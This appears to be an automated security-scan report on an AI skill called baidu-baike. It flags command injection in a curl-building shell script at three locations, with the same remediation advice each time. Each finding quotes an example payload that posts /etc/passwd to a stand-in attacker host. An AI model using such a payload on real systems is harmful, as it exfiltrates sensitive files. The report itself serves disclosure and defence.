Trust Assessment
baidu-baike received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 3 critical, 0 high, 0 medium, and 0 low severity. Key findings include Command Injection via Unsanitized User Input in Curl Arguments.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Command Injection via Unsanitized User Input in Curl Arguments: The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically. | LLM | baidu_baike.sh:22 |
| CRITICAL | Command Injection via Unsanitized User Input in Curl Arguments: The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically. | LLM | baidu_baike.sh:33 |
| CRITICAL | Command Injection via Unsanitized User Input in Curl Arguments: The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically. | LLM | baidu_baike.sh:45 |